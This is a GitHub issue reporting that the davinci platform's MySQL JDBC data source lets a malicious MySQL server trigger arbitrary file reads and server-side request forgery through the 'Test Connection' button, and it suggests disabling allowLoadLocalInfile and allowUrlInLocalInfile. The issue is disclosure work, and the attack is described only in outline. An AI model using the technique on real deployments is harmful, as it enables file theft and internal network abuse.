search

edp963 / davinci

Davinci is a DVsaaS (Data Visualization as a Service) Platform
https://edp963.github.io/davinci
Apache License 2.0
4.89k stars 1.82k forks source link

DataSource Mysql JDBC Connection has two vulnerabilities : arbitrary file read and Server-side request forgery(SSRF) #2326

Open Bertram2000 opened 1 year ago

Bertram2000 commented 1 year ago

use a malicious mysql server:

login and then Mysql JDBC Connection is set as a malicious server image

Click Test Connection two vulnerabilities : 1.arbitrary file read: image

success! image

2.Server-side request forgery(SSRF) : image

Visit Baidu success! image

Repair suggestion: Set these properties to false:allowLoadLocalInfile、allowUrlInLocalInfile